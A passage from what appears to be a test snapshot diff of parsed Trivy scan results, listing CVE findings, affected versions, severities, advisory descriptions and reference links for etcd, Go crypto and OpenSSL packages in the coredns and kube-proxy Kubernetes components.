"https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8057.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8057", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/pull/962", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/pull/987", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-21698.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8057.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", + "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0322", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-21698", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "3.4.0", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2018-1099", - "installedVersion": "v0.5.0-alpha.5.0.20200306183522-221f0cc107cb", - "packageName": "go.etcd.io/etcd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-1099", - "https://bugzilla.redhat.com/show_bug.cgi?id=1552717", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1099", - "https://github.com/advisories/GHSA-wf43-55jj-vwq8", - "https://github.com/coreos/etcd/commit/a7e5790c82039945639798ae9a3289fe787f5e56", - "https://github.com/coreos/etcd/issues/9353", - "https://github.com/etcd-io/etcd/issues/10479", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JX7QTIT465BQGRGNCE74RATRQLKT2QE4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UPGYHMSKDPW5GAMI7BEP3XQRVRLLBJKS/", - "https://nvd.nist.gov/vuln/detail/CVE-2018-1099", - "https://www.cve.org/CVERecord?id=CVE-2018-1099", - ], - }, - "category": "Vulnerability", - "description": "DNS rebinding vulnerability found in etcd 3.3.1 and earlier. An attacker can control his DNS records to direct to localhost, and trick the browser into sending requests to localhost (or any other address).", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "etcd: DNS rebinding vulnerability in etcd server", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-1099", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-1099", + "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1552717", + "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1099", + "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-wf43-55jj-vwq8", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://github.com/coreos/etcd/commit/a7e5790c82039945639798ae9a3289fe787f5e56", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", }, { "type": "URL", - "value": "https://github.com/coreos/etcd/issues/9353", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/issues/10479", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JX7QTIT465BQGRGNCE74RATRQLKT2QE4/", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UPGYHMSKDPW5GAMI7BEP3XQRVRLLBJKS/", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-1099", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-1099", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.5.0-alpha.5.0.20200423152442-f4b650b51dc4", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-15112", - "installedVersion": "v0.5.0-alpha.5.0.20200306183522-221f0cc107cb", - "packageName": "go.etcd.io/etcd", + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-15112", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15112", - "https://github.com/advisories/GHSA-m332-53r6-2w93", - "https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf", - "https://github.com/etcd-io/etcd/commit/7d1cf640497cbcdfb932e619b13624112c7e3865", - "https://github.com/etcd-io/etcd/commit/f4b650b51dc4a53a8700700dc12e1242ac56ba07", - "https://github.com/etcd-io/etcd/pull/11793", - "https://github.com/etcd-io/etcd/security/advisories/GHSA-m332-53r6-2w93", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-15112", - "https://pkg.go.dev/vuln/GO-2020-0005", - "https://ubuntu.com/security/notices/USN-5628-1", - "https://ubuntu.com/security/notices/USN-5628-2", - "https://www.cve.org/CVERecord?id=CVE-2020-15112", + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://linux.oracle.com/cve/CVE-2023-0464.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", ], }, "category": "Vulnerability", - "description": "In etcd before versions 3.3.23 and 3.4.10, it is possible to have an entry index greater then the number of entries in the ReadAll method in wal/wal.go. This could cause issues when WAL entries are being read during consensus as an arbitrary etcd consensus participant could go down from a runtime panic when reading the entry.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "etcd: DoS in wal/wal.go", + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-15112", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-15112", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15112", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-m332-53r6-2w93", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/commit/7d1cf640497cbcdfb932e619b13624112c7e3865", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/commit/f4b650b51dc4a53a8700700dc12e1242ac56ba07", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/pull/11793", + "value": "https://linux.oracle.com/cve/CVE-2023-0464.html", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/security/advisories/GHSA-m332-53r6-2w93", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-15112", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2020-0005", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5628-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5628-2", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-15112", + "value": "https://www.openssl.org/news/secadv/20230322.txt", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.5.0-alpha.5.0.20200423152442-f4b650b51dc4", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-15106", - "installedVersion": "v0.5.0-alpha.5.0.20200306183522-221f0cc107cb", - "packageName": "go.etcd.io/etcd", + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-15106", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15106", - "https://github.com/advisories/GHSA-p4g4-wgrh-qrg2", - "https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf", - "https://github.com/etcd-io/etcd/commit/4571e528f49625d3de3170f219a45c3b3d38c675", - "https://github.com/etcd-io/etcd/commit/f4b650b51dc4a53a8700700dc12e1242ac56ba07", - "https://github.com/etcd-io/etcd/pull/11793", - "https://github.com/etcd-io/etcd/security/advisories/GHSA-p4g4-wgrh-qrg2", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-15106", - "https://pkg.go.dev/vuln/GO-2020-0005", - "https://ubuntu.com/security/notices/USN-5628-1", - "https://ubuntu.com/security/notices/USN-5628-2", - "https://www.cve.org/CVERecord?id=CVE-2020-15106", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://linux.oracle.com/cve/CVE-2023-2650.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://ubuntu.com/security/notices/USN-6188-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "In etcd before versions 3.3.23 and 3.4.10, a large slice causes panic in decodeRecord method. The size of a record is stored in the length field of a WAL file and no additional validation is done on this data. Therefore, it is possible to forge an extremely large frame size that can unintentionally panic at the expense of any RAFT participant trying to decode the WAL.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "etcd: Large slice causes panic in decodeRecord method", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-15106", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-15106", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15106", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p4g4-wgrh-qrg2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/commit/4571e528f49625d3de3170f219a45c3b3d38c675", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/commit/f4b650b51dc4a53a8700700dc12e1242ac56ba07", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/pull/11793", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://github.com/etcd-io/etcd/security/advisories/GHSA-p4g4-wgrh-qrg2", + "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-15106", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2020-0005", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5628-1", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5628-2", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-15106", + "value": "https://ubuntu.com/security/notices/USN-6188-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20201216223049-8b5274cf687f", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-29652", - "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", - "packageName": "golang.org/x/crypto", + "fixedVersion": "1.1.1d-0+deb10u8", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-4160", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-29652", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652", - "https://errata.almalinux.org/8/ALSA-2021-1796.html", - "https://github.com/advisories/GHSA-3vm4-22fp-5rfm", - "https://go-review.googlesource.com/c/crypto/+/278852", - "https://go.dev/cl/278852", - "https://go.googlesource.com/crypto/+/8b5274cf687fd9316b4108863654cc57385531e8", - "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1", - "https://linux.oracle.com/cve/CVE-2020-29652.html", - "https://linux.oracle.com/errata/ELSA-2021-1796.html", - "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", - "https://pkg.go.dev/vuln/GO-2021-0227", - "https://www.cve.org/CVERecord?id=CVE-2020-29652", + "https://access.redhat.com/security/cve/CVE-2021-4160", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", + "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", + "https://security.gentoo.org/glsa/202210-02", + "https://www.cve.org/CVERecord?id=CVE-2021-4160", + "https://www.debian.org/security/2022/dsa-5103", + "https://www.openssl.org/news/secadv/20220128.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.0-20201203163018-be400aefbc4c for Go allows remote attackers to cause a denial of service against SSH servers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "There is a carry propagation bug in the MIPS32 and MIPS64 squaring procedure. Many EC algorithms are affected, including some of the TLS 1.3 default curves. Impact was not analyzed in detail, because the pre-requisites for attack are considered unlikely and include reusing private keys. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH private key among multiple clients, which is no longer an option since CVE-2016-0701. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0.0. It was addressed in the releases of 1.1.1m and 3.0.1 on the 15th of December 2021. For the 1.0.2 release it is addressed in git commit 6fc1aaaf3 that is available to premium support customers only. It will be made available in 1.0.2zc when it is released. The issue only affects OpenSSL on MIPS platforms. Fixed in OpenSSL 3.0.1 (Affected 3.0.0). Fixed in OpenSSL 1.1.1m (Affected 1.1.1-1.1.1l). Fixed in OpenSSL 1.0.2zc-dev (Affected 1.0.2-1.0.2zb).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference", + "name": "openssl: Carry propagation bug in the MIPS32 and MIPS64 squaring procedure", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-29652", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-29652", - }, - { - "type": "URL", - "value": 